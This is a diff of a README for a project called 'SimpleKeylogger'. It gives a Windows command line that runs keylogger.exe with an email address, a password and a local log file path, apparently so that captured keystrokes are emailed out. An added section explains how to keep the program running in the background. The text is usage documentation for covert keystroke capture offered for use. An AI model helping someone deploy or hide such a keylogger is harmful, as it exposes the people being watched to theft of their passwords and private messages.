TrueBinary/SimpleKeylogger/README.md

 ## How i use it on Windows?
 >./keylogger.exe -e "example@exemple.com" -p "example1234" --local C:/anyware/Desktop/logs.txt

+## How to let the program running on background ?
+**this is a simple just run the program with & or on the end**

 ## Syntax
 ```
  --password is your password of your email